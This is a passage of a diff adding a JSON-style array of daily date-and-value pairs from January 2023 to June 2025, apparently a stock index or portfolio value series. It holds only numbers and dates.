+ [ + "2023-01-27", + 8766.87840606964 + ], + [ + "2023-01-30", + 8589.62263673319 + ], + [ + "2023-01-31", + 8718.346214221167 + ], + [ + "2023-02-01", + 8904.774892757967 + ], + [ + "2023-02-02", + 9224.366781604953 + ], + [ + "2023-02-03", + 9060.428990222406 + ], + [ + "2023-02-06", + 8983.785260584722 + ], + [ + "2023-02-07", + 9169.917534027443 + ], + [ + "2023-02-08", + 9006.866196388994 + ], + [ + "2023-02-09", + 8927.264859399507 + ], + [ + "2023-02-10", + 8868.673304606586 + ], + [ + "2023-02-13", + 9010.71301902304 + ], + [ + "2023-02-14", + 9077.295544690845 + ], + [ + "2023-02-15", + 9146.836598223172 + ], + [ + "2023-02-16", + 8975.205161572534 + ], + [ + "2023-02-17", + 8911.876648350612 + ], + [ + "2023-02-21", + 8700.88777007728 + ], + [ + "2023-02-22", + 8707.397635994477 + ], + [ + "2023-02-23", + 8783.447634931284 + ], + [ + "2023-02-24", + 8636.376398017179 + ], + [ + "2023-02-27", + 8698.222885768699 + ], + [ + "2023-02-28", + 8686.978822960644 + ], + [ + "2023-03-01", + 8617.143205359667 + ], + [ + "2023-03-02", + 8688.457166380187 + ], + [ + "2023-03-03", + 8868.07957390571 + ], + [ + "2023-03-06", + 8878.142618901016 + ], + [ + "2023-03-07", + 8769.245044258712 + ], + [ + "2023-03-08", + 8813.042118703612 + ], + [ + "2023-03-09", + 8660.345628590978 + ], + [ + "2023-03-10", + 8538.721965670215 + ], + [ + "2023-03-13", + 8602.050478892137 + ], + [ + "2023-03-14", + 8799.725061262423 + ], + [ + "2023-03-15", + 8845.88601235825 + ], + [ + "2023-03-16", + 9079.0721342299 + ], + [ + "2023-03-17", + 9036.162434041813 + ], + [ + "2023-03-20", + 9068.231255990811 + ], + [ + "2023-03-21", + 9197.74831543872 + ], + [ + "2023-03-22", + 9072.676411889306 + ], + [ + "2023-03-23", + 9180.261335400683 + ], + [ + "2023-03-24", + 9214.049675100436 + ], + [ + "2023-03-27", + 9150.920913137566 + ], + [ + "2023-03-28", + 9102.314159759217 + ], + [ + "2023-03-29", + 9268.284443215458 + ], + [ + "2023-03-30", + 9356.012986961581 + ], + [ + "2023-03-31", + 9511.610012637719 + ], + [ + "2023-04-03", + 9488.492256324866 + ], + [ + "2023-04-04", + 9456.484188215025 + ], + [ + "2023-04-05", + 9363.126709219514 + ], + [ + "2023-04-06", + 9426.252709644239 + ], + [ + "2023-04-10", + 9420.920179488934 + ], + [ + "2023-04-11", + 9360.458142860076 + ], + [ + "2023-04-12", + 9277.77032673875 + ], + [ + "2023-04-13", + 9459.447318643117 + ], + [ + "2023-04-14", + 9441.665774536428 + ], + [ + "2023-04-17", + 9449.666871051173 + ], + [ + "2023-04-18", + 9450.259681239335 + ], + [ + "2023-04-19", + 9445.813604828127 + ], + [ + "2023-04-20", + 9373.795451580985 + ], + [ + "2023-04-21", + 9383.576819685642 + ], + [ + "2023-04-24", + 9364.014083476328 + ], + [ + "2023-04-25", + 9187.3741371459 + ], + [ + "2023-04-26", + 9243.092771756756 + ], + [ + "2023-04-27", + 9494.422199231905 + ], + [ + "2023-04-28", + 9559.91851989656 + ], + [ + "2023-05-01", + 9548.954292953724 + ], + [ + "2023-05-02", + 9465.671825618807 + ], + [ + "2023-05-03", + 9403.728684032261 + ], + [ + "2023-05-04", + 9370.535916058814 + ], + [ + "2023-05-05", + 9569.700808513933 + ], + [ + "2023-05-08", + 9593.410454502233 + ], + [ + "2023-05-09", + 9532.653853804723 + ], + [ + "2023-05-10", + 9636.386431605768 + ], + [ + "2023-05-11", + 9667.799848502018 + ], + [ + "2023-05-12", + 9633.124134545453 + ], + [ + "2023-05-15", + 9685.286828540055 + ], + [ + "2023-05-16", + 9696.25289650832 + ], + [ + "2023-05-17", + 9813.61826761164 + ], + [ + "2023-05-18", + 9995.887149191454 + ], + [ + "2023-05-19", + 9973.36588511762 + ], + [ + "2023-05-22", + 10006.854137672433 + ], + [ + "2023-05-23", + 9880.005644583965 + ], + [ + "2023-05-24", + 9829.32589657248 + ], + [ + "2023-05-25", + 10068.503635703042 + ], + [ + "2023-05-26", + 10325.755641983516 + ], + [ + "2023-05-30", + 10372.5848853101 + ], + [ + "2023-05-31", + 10313.603953638929 + ], + [ + "2023-06-01", + 10432.749596332162 + ], + [ + "2023-06-02", + 10510.99133604228 + ], + [ + "2023-06-05", + 10518.402383907007 + ], + [ + "2023-06-06", + 10516.62303282981 + ], + [ + "2023-06-07", + 10338.205576447614 + ], + [ + "2023-06-08", + 10466.534253981057 + ], + [ + "2023-06-09", + 10506.545259631072 + ], + [ + "2023-06-12", + 10684.07626226917 + ], + [ + "2023-06-13", + 10766.174029740478 + ], + [ + "2023-06-14", + 10844.413928425165 + ], + [ + "2023-06-15", + 10973.636423804423 + ], + [ + "2023-06-16", + 10904.577718934514 + ], + [ + "2023-06-20", + 10888.968584834129 + ], + [ + "2023-06-21", + 10740.578253200094 + ], + [ + "2023-06-22", + 10867.305238610243 + ], + [ + "2023-06-23", + 10759.570271526398 + ], + [ + "2023-06-26", + 10615.332372747633 + ], + [ + "2023-06-27", + 10797.856236349371 + ], + [ + "2023-06-28", + 10818.928613410526 + ], + [ + "2023-06-29", + 10797.263426161211 + ], + [ + "2023-06-30", + 10963.758401864738 + ], + [ + "2023-07-03", + 10989.578783507468 + ], + [ + "2023-07-05", + 10989.283298926102 + ], + [ + "2023-07-06", + 10905.588441895074 + ], + [ + "2023-07-07", + 10869.381915294236 + ], + [ + "2023-07-10", + 10872.942458474061 + ], + [ + "2023-07-11", + 10926.661739468944 + ], + [ + "2023-07-12", + 11064.664085119442 + ], + [ + "2023-07-13", + 11252.527842978205 + ], + [ + "2023-07-14", + 11250.15476120013 + ], + [ + "2023-07-17", + 11355.214718335536 + ], + [ + "2023-07-18", + 11448.109179435636 + ], + [ + "2023-07-19", + 11445.438772050768 + ], + [ + "2023-07-20", + 11181.597735759646 + ], + [ + "2023-07-21", + 11148.059775518246 + ], + [ + "2023-07-24", + 11165.867093980942 + ], + [ + "2023-07-25", + 11241.547046806507 + ], + [ + "2023-07-26", + 11204.152138291203 + ], + [ + "2023-07-27", + 11177.441620853517 + ], + [ + "2023-07-28", + 11381.035099978266 + ], + [ + "2023-07-31", + 11386.970565961594 + ], + [ + "2023-08-01", + 11360.558294643417 + ], + [ + "2023-08-02", + 11111.260438729247 + ], + [ + "2023-08-03", + 11093.454040779265 + ], + [ + "2023-08-04", + 11041.51595188701 + ], + [ + "2023-08-07", + 11135.002302662555 + ], + [ + "2023-08-08", + 11040.327569972544 + ], + [ + "2023-08-09", + 10918.944160870275 + ], + [ + "2023-08-10", + 10939.125481623758 + ], + [ + "2023-08-11", + 10869.381915294236 + ], + [ + "2023-08-14", + 10991.358134584667 + ], + [ + "2023-08-15", + 10874.722730063973 + ], + [ + "2023-08-16", + 10759.570271526398 + ], + [ + "2023-08-17", + 10642.045651723462 + ], + [ + "2023-08-18", + 10628.690853260976 + ], + [ + "2023-08-21", + 10799.93383354608 + ], + [ + "2023-08-22", + 10784.500517374172 + ], + [ + "2023-08-23", + 10954.556036257523 + ], + [ + "2023-08-24", + 10720.397852959324 + ], + [ + "2023-08-25", + 10803.495297238618 + ], + [ + "2023-08-28", + 10884.813390440715 + ], + [ + "2023-08-29", + 11122.535798969597 + ], + [ + "2023-08-30", + 11184.564548238593 + ], + [ + "2023-08-31", + 11218.10158796728 + ], + [ + "2023-09-01", + 11206.228814975195 + ], + [ + "2023-09-05", + 11220.47651077078 + ], + [ + "2023-09-06", + 11121.646583687354 + ], + [ + "2023-09-07", + 11042.108762075171 + ], + [ + "2023-09-08", + 11057.54207824708 + ], + [ + "2023-09-11", + 11187.829606837053 + ], + [ + "2023-09-12", + 11063.775790349915 + ], + [ + "2023-09-13", + 11105.915941908652 + ], + [ + "2023-09-14", + 11196.733726324757 + ], + [ + "2023-09-15", + 11005.009338141233 + ], + [ + "2023-09-18", + 11016.483529127921 + ], + [ + "2023-09-19", + 10993.00493183097 + ], + [ + "2023-09-20", + 10834.587455197496 + ], + [ + "2023-09-21", + 10636.05035241369 + ], + [ + "2023-09-22", + 10637.536980447665 + ], + [ + "2023-09-25", + 10688.061161810394 + ], + [ + "2023-09-26", + 10527.568849518355 + ], + [ + "2023-09-27", + 10552.236749242487 + ], + [ + "2023-09-28", + 10640.510236515616 + ], + [ + "2023-09-29", + 10648.237940754145 + ], + [ + "2023-10-02", + 10737.10331770272 + ], + [ + "2023-10-03", + 10548.672524011805 + ], + [ + "2023-10-04", + 10692.22464081824 + ], + [ + "2023-10-05", + 10660.718252137822 + ], + [ + "2023-10-06", + 10839.34558541893 + ], + [ + "2023-10-09", + 10894.626976490381 + ], + [ + "2023-10-10", + 10954.961061851918 + ], + [ + "2023-10-11", + 11033.12639900673 + ], + [ + "2023-10-12", + 10994.787964959027 + ], + [ + "2023-10-13", + 10856.583106511329 + ], + [ + "2023-10-16", + 10979.330715456541 + ], + [ + "2023-10-17", + 10943.369965750484 + ], + [ + "2023-10-18", + 10799.81416689319 + ], + [ + "2023-10-19", + 10698.762122116874 + ], + [ + "2023-10-20", + 10539.159025107076 + ], + [ + "2023-10-23", + 10570.960898368861 + ], + [ + "2023-10-24", + 10673.797817298662 + ], + [ + "2023-10-25", + 10412.547103786244 + ], + [ + "2023-10-26", + 10214.010001002438 + ], + [ + "2023-10-27", + 10263.04939535662 + ], + [ + "2023-10-30", + 10378.665792302323 + ], + [ + "2023-10-31", + 10428.30075838281 + ], + [ + "2023-11-01", + 10609.303014467423 + ], + [ + "2023-11-02", + 10801.895446140756 + ], + [ + "2023-11-03", + 10928.804693068383 + ], + [ + "2023-11-06", + 10973.387885371498 + ], + [ + "2023-11-07", + 11077.114940096255 + ], + [ + "2023-11-08", + 11084.248913633906 + ], + [ + "2023-11-09", + 10998.947761916013 + ], + [ + "2023-11-10", + 11246.22969498535 + ], + [ + "2023-11-13", + 11211.15724004882 + ], + [ + "2023-11-14", + 11452.492660982256 + ], + [ + "2023-11-15", + 11461.113262553883 + ], + [ + "2023-11-16", + 11470.923166552691 + ], + [ + "2023-11-17", + 11473.596335475704 + ], + [ + "2023-11-20", + 11613.286901444662 + ], + [ + "2023-11-21", + 11545.8206835709 + ], + [ + "2023-11-22", + 11593.077965309742 + ], + [ + "2023-11-24", + 11576.7305800123 + ], + [ + "2023-11-27", + 11566.62427091941 + ], + [ + "2023-11-28", + 11596.93951614722 + ], + [ + "2023-11-29", + 11585.64574565258 + ], + [ + "2023-11-30", + 11556.518882339236 + ], + [ + "2023-12-01", + 11589.509137515486 + ], + [ + "2023-12-04", + 11481.919611440537 + ], + [ + "2023-12-05", + 11510.748228634371 + ], + [ + "2023-12-06", + 11444.173067068281 + ], + [ + "2023-12-07", + 11604.074410197587 + ], + [ + "2023-12-08", + 11655.787893987495 + ], + [ + "2023-12-11", + 11755.35423124255 + ], + [ + "2023-12-12", + 11848.975897387134 + ], + [ + "2023-12-13", + 11999.661987731222 + ], + [ + "2023-12-14", + 11989.262035082396 + ], + [ + "2023-12-15", + 12047.217515589573 + ], + [ + "2023-12-18", + 12123.098140186907 + ], + [ + "2023-12-19", + 12185.041281773452 + ], + [ + "2023-12-20", + 12003.977351336967 + ], + [ + "2023-12-21", + 12143.64674551349 + ], + [ + "2023-12-22", + 12161.813063934855 + ], + [ + "2023-12-26", + 12236.265052799228 + ], + [ + "2023-12-27", + 12261.173206341853 + ], + [ + "2023-12-28", + 12255.214727540664 + ], + [ + "2023-12-29", + 12202.178466979965 + ], + [ + "2024-01-02", + 11995.689975368 + ], + [ + "2024-01-03", + 11868.757715622509 + ], + [ + "2024-01-04", + 11807.675253424055 + ], + [ + "2024-01-05", + 11821.679933863003 + ], + [ + "2024-01-08", + 12066.008862144108 + ], + [ + "2024-01-09", + 12089.845538887013 + ], + [ + "2024-01-10", + 12171.78681919685 + ], + [ + "2024-01-11", + 12197.112885511875 + ], + [ + "2024-01-12", + 12203.369610432575 + ], + [ + "2024-01-16", + 12202.178466979965 + ], + [ + "2024-01-17", + 12133.348049263263 + ], + [ + "2024-01-18", + 12305.571375589347 + ], + [ + "2024-01-19", + 12549.602978263658 + ], + [ + "2024-01-22", + 12565.989945607824 + ], + [ + "2024-01-23", + 12618.135149860851 + ], + [ + "2024-01-24", + 12688.154870004733 + ], + [ + "2024-01-25", + 12703.648019503087 + ], + [ + "2024-01-26", + 12627.967146164809 + ], + [ + "2024-01-29", + 12757.282613328232 + ], + [ + "2024-01-30", + 12672.362553874158 + ], + [ + "2024-01-31", + 12424.160108090286 + ], + [ + "2024-02-01", + 12570.45995534961 + ], + [ + "2024-02-02", + 12782.90784627548 + ], + [ + "2024-02-05", + 12766.220791786376 + ], + [ + "2024-02-06", + 12740.597399864555 + ], + [ + "2024-02-07", + 12871.701423232324 + ], + [ + "2024-02-08", + 12895.538099975229 + ], + [ + "2024-02-09", + 13022.47035972072 + ], + [ + "2024-02-12", + 12971.518139945732 + ], + [ + "2024-02-13", + 12769.201411956043 + ], + [ + "2024-02-14", + 12908.34979593614 + ], + [ + "2024-02-15", + 12946.788565869727 + ], + [ + "2024-02-16", + 12829.390056308683 + ], + [ + "2024-02-20", + 12732.552118739513 + ], + [ + "2024-02-21", + 12681.59897845181 + ], + [ + "2024-02-22", + 13052.862007503836 + ], + [ + "2024-02-23", + 13014.425078595677 + ], + [ + "2024-02-26", + 13007.570020410529 + ], + [ + "2024-02-27", + 13038.856406552173 + ], + [ + "2024-02-28", + 12969.43133762188 + ], + [ + "2024-02-29", + 13080.571281236793 + ], + [ + "2024-03-01", + 13277.525102151598 + ], + [ + "2024-03-04", + 13230.14907427258 + ], + [ + "2024-03-05", + 12992.671522125765 + ], + [ + "2024-03-06", + 13074.314556316094 + ], + [ + "2024-03-07", + 13272.75868731573 + ], + [ + "2024-03-08", + 13081.169614501241 + ], + [ + "2024-03-11", + 13032.600602144186 + ], + [ + "2024-03-12", + 13219.424180635524 + ], + [ + "2024-03-13", + 13117.818907717772 + ], + [ + "2024-03-14", + 13084.743965371785 + ], + [ + "2024-03-15", + 12929.20861404752 + ], + [ + "2024-03-18", + 13052.519576774028 + ], + [ + "2024-03-19", + 13085.040370465866 + ], + [ + "2024-03-20", + 13240.18450388645 + ], + [ + "2024-03-21", + 13302.841963339477 + ], + [ + "2024-03-22", + 13318.056197485324 + ], + [ + "2024-03-25", + 13269.722836383191 + ], + [ + "2024-03-26", + 13226.758825944946 + ], + [ + "2024-03-27", + 13271.811479732472 + ], + [ + "2024-03-28", + 13247.34609280554 + ], + [ + "2024-04-01", + 13275.391353679302 + ], + [ + "2024-04-02", + 13160.820659177314 + ], + [ + "2024-04-03", + 13190.359912186768 + ], + [ + "2024-04-04", + 12988.670053355678 + ], + [ + "2024-04-05", + 13141.726463939696 + ], + [ + "2024-04-08", + 13145.606425031465 + ], + [ + "2024-04-09", + 13194.237111740395 + ], + [ + "2024-04-10", + 13079.071766024814 + ], + [ + "2024-04-11", + 13287.923213774993 + ], + [ + "2024-04-12", + 13076.089304829718 + ], + [ + "2024-04-15", + 12860.973768057123 + ], + [ + "2024-04-16", + 12862.16675253516 + ], + [ + "2024-04-17", + 12705.231301372089 + ], + [ + "2024-04-18", + 12632.731719975245 + ], + [ + "2024-04-19", + 12371.36962442437 + ], + [ + "2024-04-22", + 12495.785202408319 + ], + [ + "2024-04-23", + 12682.257145042702 + ], + [ + "2024-04-24", + 12725.22115548095 + ], + [ + "2024-04-25", + 12663.75852153139 + ], + [ + "2024-04-26", + 12859.184291340065 + ], + [ + "2024-04-29", + 12911.395772508538 + ], + [ + "2024-04-30", + 12667.936728742668 + ], + [ + "2024-05-01", + 12576.342031595494 + ], + [ + "2024-05-02", + 12736.857356705397 + ], + [ + "2024-05-03", + 12992.847340054243 + ], + [ + "2024-05-06", + 13135.16412879777 + ], + [ + "2024-05-07", + 13137.251851634339 + ], + [ + "2024-05-08", + 13129.49561150166 + ], + [ + "2024-05-09", + 13158.136444101727 + ], + [ + "2024-05-10", + 13189.166007196016 + ], + [ + "2024-05-13", + 13219.597237025857 + ], + [ + "2024-05-14", + 13304.629599031105 + ], + [ + "2024-05-15", + 13512.584467397326 + ], + [ + "2024-05-16", + 13485.136619275298 + ], + [ + "2024-05-17", + 13478.572443107942 + ], + [ + "2024-05-20", + 13572.555870749336 + ], + [ + "2024-05-21", + 13599.107139487409 + ], + [ + "2024-05-22", + 13596.422924411821 + ], + [ + "2024-05-23", + 13535.260377607203 + ], + [ + "2024-05-24", + 13663.255829537982 + ], + [ + "2024-05-28", + 13714.870818467436 + ], + [ + "2024-05-29", + 13618.204096263169 + ], + [ + "2024-05-30", + 13472.305592547382 + ], + [ + "2024-05-31", + 13447.244633894143 + ], + [ + "2024-06-03", + 13519.447810196905 + ], + [ + "2024-06-04", + 13556.442295681387 + ], + [ + "2024-06-05", + 13829.73883857622 + ], + [ + "2024-06-06", + 13824.964139125923 + ], + [ + "2024-06-07", + 13812.730525149742 + ], + [ + "2024-06-10", + 13868.525562315903 + ], + [ + "2024-06-11", + 13963.700133409908 + ], + [ + "2024-06-12", + 14146.593122610177 + ], + [ + "2024-06-13", + 14223.269990705583 + ], + [ + "2024-06-14", + 14296.965318118608 + ], + [ + "2024-06-17", + 14472.102067186197 + ], + [ + "2024-06-18", + 14476.575758978843 + ], + [ + "2024-06-20", + 14364.99212823552 + ], + [ + "2024-06-21", + 14326.50180958992 + ], + [ + "2024-06-24", + 14163.399843752171 + ], + [ + "2024-06-25", + 14325.365896900183 + ], + [ + "2024-06-26", + 14354.951175545364 + ], + [ + "2024-06-27", + 14392.00549435629 + ], + [ + "2024-06-28", + 14317.297602957276 + ], + [ + "2024-07-01", + 14401.270454828094 + ], + [ + "2024-07-02", + 14552.47939639404 + ], + [ + "2024-07-03", + 14673.803892682577 + ], + [ + "2024-07-05", + 14826.806913529153 + ], + [ + "2024-07-08", + 14862.068073572163 + ], + [ + "2024-07-09", + 14874.917510554369 + ], + [ + "2024-07-10", + 15030.011936288369 + ], + [ + "2024-07-11", + 14700.401187056375 + ], + [ + "2024-07-12", + 14786.762769421415 + ], + [ + "2024-07-15", + 14826.506826384215 + ], + [ + "2024-07-16", + 14832.185469320186 + ], + [ + "2024-07-17", + 14396.787557908305 + ], + [ + "2024-07-18", + 14328.65488882922 + ], + [ + "2024-07-19", + 14201.651749604709 + ], + [ + "2024-07-22", + 14413.223312426342 + ], + [ + "2024-07-23", + 14362.422056736537 + ], + [ + "2024-07-24", + 13847.237785279547 + ], + [ + "2024-07-25", + 13694.533931065196 + ], + [ + "2024-07-26", + 13834.984840536361 + ], + [ + "2024-07-29", + 13862.777880926342 + ], + [ + "2024-07-30", + 13672.421374636617 + ], + [ + "2024-07-31", + 14077.039181899849 + ], + [ + "2024-08-01", + 13736.07298782134 + ], + [ + "2024-08-02", + 13410.048556125179 + ], + [ + "2024-08-05", + 13010.211891901246 + ], + [ + "2024-08-06", + 13134.526213486597 + ], + [ + "2024-08-07", + 12992.281224734803 + ], + [ + "2024-08-08", + 13389.727317439087 + ], + [ + "2024-08-09", + 13459.654986311516 + ], + [ + "2024-08-12", + 13488.641011179534 + ], + [ + "2024-08-13", + 13823.330229057623 + ], + [ + "2024-08-14", + 13827.814046490126 + ], + [ + "2024-08-15", + 14177.145860118335 + ], + [ + "2024-08-16", + 14195.375693917003 + ], + [ + "2024-08-19", + 14381.845795525958 + ], + [ + "2024-08-20", + 14351.66494515447 + ], + [ + "2024-08-21", + 14418.60278873009 + ], + [ + "2024-08-22", + 14189.998058638685 + ], + [ + "2024-08-23", + 14343.89397681836 + ], + [ + "2024-08-26", + 14204.639733876093 + ], + [ + "2024-08-27", + 14247.073528990766 + ], + [ + "2024-08-28", + 14085.405721962265 + ], + [ + "2024-08-29", + 14064.785316643947 + ], + [ + "2024-08-30", + 14232.43001272793 + ], + [ + "2024-09-03", + 13800.32017273237 + ], + [ + "2024-09-04", + 13764.460679424912 + ], + [ + "2024-09-05", + 13777.311036919831 + ], + [ + "2024-09-06", + 13408.25447684455 + ], + [ + "2024-09-09", + 13580.679395455116 + ], + [ + "2024-09-10", + 13706.18946305665 + ], + [ + "2024-09-11", + 14003.82436212381 + ], + [ + "2024-09-12", + 14141.287287323592 + ], + [ + "2024-09-13", + 14204.639733876093 + ], + [ + "2024-09-16", + 14141.884700075325 + ], + [ + "2024-09-17", + 14149.355581266498 + ], + [ + "2024-09-18", + 14088.095460114138 + ], + [ + "2024-09-19", + 14444.301662694501 + ], + [ + "2024-09-20", + 14416.810550474887 + ], + [ + "2024-09-23", + 14455.024715306128 + ], + [ + "2024-09-24", + 14524.74987138136 + ], + [ + "2024-09-25", + 14538.216051882306 + ], + [ + "2024-09-26", + 14647.442249563699 + ], + [ + "2024-09-27", + 14566.045912780868 + ], + [ + "2024-09-30", + 14605.54695438703 + ], + [ + "2024-10-01", + 14402.055652173593 + ], + [ + "2024-10-02", + 14422.405426753838 + ], + [ + "2024-10-03", + 14411.632666455624 + ], + [ + "2024-10-04", + 14583.103013381216 + ], + [ + "2024-10-07", + 14426.893846749914 + ], + [ + "2024-10-08", + 14642.354575790461 + ], + [ + "2024-10-09", + 14757.566867654481 + ], + [ + "2024-10-10", + 14740.808933686356 + ], + [ + "2024-10-11", + 14763.850287443904 + ], + [ + "2024-10-14", + 14887.740252667852 + ], + [ + "2024-10-15", + 14688.739211475922 + ], + [ + "2024-10-16", + 14690.534211269267 + ], + [ + "2024-10-17", + 14700.708638303031 + ], + [ + "2024-10-18", + 14797.067909260642 + ], + [ + "2024-10-21", + 14825.497023936368 + ], + [ + "2024-10-22", + 14841.656624640045 + ], + [ + "2024-10-23", + 14614.22646877239 + ], + [ + "2024-10-24", + 14732.72867307816 + ], + [ + "2024-10-25", + 14822.503516588698 + ], + [ + "2024-10-28", + 14824.89869067192 + ], + [ + "2024-10-29", + 14967.340669144625 + ], + [ + "2024-10-30", + 14854.225305244317 + ], + [ + "2024-10-31", + 14479.262735592572 + ], + [ + "2024-11-01", + 14586.395687361111 + ], + [ + "2024-11-04", + 14543.902058919994 + ], + [ + "2024-11-05", + 14729.437840123695 + ], + [ + "2024-11-06", + 15129.53500944584 + ], + [ + "2024-11-07", + 15367.738846124425 + ], + [ + "2024-11-08", + 15385.695287646877 + ], + [ + "2024-11-11", + 15376.718447654723 + ], + [ + "2024-11-12", + 15348.884904705303 + ], + [ + "2024-11-13", + 15329.137145440365 + ], + [ + "2024-11-14", + 15222.603447448988 + ], + [ + "2024-11-15", + 14859.911312282005 + ], + [ + "2024-11-18", + 14963.152336293488 + ], + [ + "2024-11-19", + 15066.094193672745 + ], + [ + "2024-11-20", + 15057.416520312816 + ], + [ + "2024-11-21", + 15111.581329461535 + ], + [ + "2024-11-22", + 15135.820270260692 + ], + [ + "2024-11-25", + 15159.760044427625 + ], + [ + "2024-11-26", + 15241.155460697742 + ], + [ + "2024-11-27", + 15121.156502718137 + ], + [ + "2024-11-29", + 15254.02330793424 + ], + [ + "2024-12-02", + 15420.10681445437 + ], + [ + "2024-12-03", + 15467.389870549217 + ], + [ + "2024-12-04", + 15658.613499816036 + ], + [ + "2024-12-05", + 15615.218689427387 + ], + [ + "2024-12-06", + 15754.970929748219 + ], + [ + "2024-12-09", + 15632.275790027736 + ], + [ + "2024-12-10", + 15579.011242313834 + ], + [ + "2024-12-11", + 15857.910025589334 + ], + [ + "2024-12-12", + 15755.569263012667 + ], + [ + "2024-12-13", + 15876.167474769436 + ], + [ + "2024-12-16", + 16104.795217678704 + ], + [ + "2024-12-17", + 16033.871554049147 + ], + [ + "2024-12-18", + 15455.419523209393 + ], + [ + "2024-12-19", + 15386.591867030833 + ], + [ + "2024-12-20", + 15520.958187458917 + ], + [ + "2024-12-23", + 15672.172652101148 + ], + [ + "2024-12-24", + 15884.684058404322 + ], + [ + "2024-12-26", + 15873.891967339105 + ], + [ + "2024-12-27", + 15662.880996760623 + ], + [ + "2024-12-30", + 15454.565287410303 + ], + [ + "2024-12-31", + 15323.282684575917 + ], + [ + "2025-01-02", + 15293.309870077916 + ], + [ + "2025-01-03", + 15543.586231007637 + ], + [ + "2025-01-06", + 15722.22645146675 + ], + [ + "2025-01-07", + 15441.675347868659 + ], + [ + "2025-01-08", + 15444.375211660392 + ], + [ + "2025-01-10", + 15202.189236978726 + ], + [ + "2025-01-13", + 15153.333024654736 + ], + [ + "2025-01-14", + 15138.94541092654 + ], + [ + "2025-01-15", + 15487.23796570004 + ], + [ + "2025-01-16", + 15378.733449986841 + ], + [ + "2025-01-17", + 15638.303307282516 + ], + [ + "2025-01-21", + 15730.01951210801 + ], + [ + "2025-01-22", + 15931.140494081517 + ], + [ + "2025-01-23", + 15965.011679925577 + ], + [ + "2025-01-24", + 15874.79222877392 + ], + [ + "2025-01-27", + 15412.602794805473 + ], + [ + "2025-01-28", + 15640.3983942208 + ], + [ + "2025-01-29", + 15611.02667452539 + ], + [ + "2025-01-30", + 15677.566856608328 + ], + [ + "2025-01-31", + 15654.786007948995 + ], + [ + "2025-02-03", + 15529.49686339895 + ], + [ + "2025-02-04", + 15720.127682477609 + ], + [ + "2025-02-05", + 15791.465576828707 + ], + [ + "2025-02-06", + 15873.891967339105 + ], + [ + "2025-02-07", + 15673.669405774985 + ], + [ + "2025-02-10", + 15863.401804444255 + ], + [ + "2025-02-11", + 15825.635008792276 + ], + [ + "2025-02-12", + 15834.928505158232 + ], + [ + "2025-02-13", + 16062.725945598988 + ], + [ + "2025-02-14", + 16130.164548091312 + ], + [ + "2025-02-18", + 16166.730995163534 + ], + [ + "2025-02-19", + 16171.228620286756 + ], + [ + "2025-02-20", + 16102.585987163819 + ], + [ + "2025-02-21", + 15768.388323075293 + ], + [ + "2025-02-24", + 15582.251447069 + ], + [ + "2025-02-25", + 15385.926336338225 + ], + [ + "2025-02-26", + 15423.09203718761 + ], + [ + "2025-02-27", + 14994.773789063223 + ], + [ + "2025-02-28", + 15231.56371821228 + ], + [ + "2025-03-03", + 14898.258951456854 + ], + [ + "2025-03-04", + 14853.299269453495 + ], + [ + "2025-03-05", + 15046.92727793068 + ], + [ + "2025-03-06", + 14632.99480250906 + ], + [ + "2025-03-07", + 14740.599977300157 + ], + [ + "2025-03-10", + 14169.307694354064 + ], + [ + "2025-03-11", + 14135.43834953543 + ], + [ + "2025-03-12", + 14294.896926049047 + ], + [ + "2025-03-13", + 14037.725004374737 + ], + [ + "2025-03-14", + 14377.02414992722 + ], + [ + "2025-03-17", + 14470.239869964691 + ], + [ + "2025-03-18", + 14223.559952210662 + ], + [ + "2025-03-19", + 14413.89068414438 + ], + [ + "2025-03-20", + 14365.03447182039 + ], + [ + "2025-03-21", + 14412.391168932401 + ], + [ + "2025-03-24", + 14728.661847905341 + ], + [ + "2025-03-25", + 14812.711102331465 + ], + [ + "2025-03-26", + 14540.148208070117 + ], + [ + "2025-03-27", + 14457.298381711033 + ], + [ + "2025-03-28", + 14076.670056301318 + ], + [ + "2025-03-31", + 14076.068961498728 + ], + [ + "2025-04-01", + 14189.537802281417 + ], + [ + "2025-04-02", + 14293.098244204843 + ], + [ + "2025-04-03", + 13527.9395399885 + ], + [ + "2025-04-04", + 12687.733275181477 + ], + [ + "2025-04-07", + 12718.352289605082 + ], + [ + "2025-04-08", + 12489.313998025133 + ], + [ + "2025-04-09", + 13988.415899795194 + ], + [ + "2025-04-10", + 13393.457234958385 + ], + [ + "2025-04-11", + 13640.206191166006 + ], + [ + "2025-04-14", + 13732.662488213986 + ], + [ + "2025-04-15", + 13747.97153516943 + ], + [ + "2025-04-16", + 13333.422316229071 + ], + [ + "2025-04-17", + 13331.020698556847 + ], + [ + "2025-04-21", + 13001.121828845206 + ], + [ + "2025-04-22", + 13342.428612628091 + ], + [ + "2025-04-23", + 13645.010347023168 + ], + [ + "2025-04-24", + 14028.941472052637 + ], + [ + "2025-04-25", + 14185.334741226847 + ], + [ + "2025-04-28", + 14180.832513540052 + ], + [ + "2025-04-29", + 14274.488238655073 + ], + [ + "2025-04-30", + 14272.686795272726 + ], + [ + "2025-05-01", + 14459.098904580665 + ], + [ + "2025-05-02", + 14673.72749012727 + ], + [ + "2025-05-05", + 14586.676443739045 + ], + [ + "2025-05-06", + 14450.994710641891 + ], + [ + "2025-05-07", + 14507.727750264165 + ], + [ + "2025-05-08", + 14657.519102249724 + ], + [ + "2025-05-09", + 14647.913552073542 + ], + [ + "2025-05-12", + 15244.67181926727 + ], + [ + "2025-05-13", + 15477.011069441545 + ], + [ + "2025-05-14", + 15569.767453634466 + ], + [ + "2025-05-15", + 15586.876102946828 + ], + [ + "2025-05-16", + 15654.719731033549 + ], + [ + "2025-05-19", + 15669.727770331341 + ], + [ + "2025-05-20", + 15617.497878908578 + ], + [ + "2025-05-21", + 15400.466755177033 + ], + [ + "2025-05-22", + 15429.285246731006 + ], + [ + "2025-05-23", + 15286.396819591751 + ], + [ + "2025-05-27", + 15646.013521779469 + ], + [ + "2025-05-28", + 15576.669457968055 + ], + [ + "2025-05-29", + 15607.289392904375 + ], + [ + "2025-05-30", + 15582.674882917687 + ], + [ + "2025-06-02", + 15705.751114901987 + ], + [ + "2025-06-03", + 15828.521736665061 + ], + [ + "2025-06-04", + 15872.65111619991 + ], + [ + "2025-06-05", + 15753.177770980303 + ], + [ + "2025-06-06", + 15907.168501969574 + ], + [ + "2025-06-09", + 15930.584504401937 + ], + [ + "2025-06-10", + 16035.950071758569 + ], + [ + "2025-06-11", + 15981.914134389886 + ], + [ + "2025-06-12", + 16019.437914685224 + ], + [ + "2025-06-13", + 15818.316932711718 + ], + [ + "2025-06-16", + 16038.34892789265 + ], + [ + "2025-06-17", + 15881.955658718438 + ], + [ + "2025-06-18", + 15879.251192363132 + ], 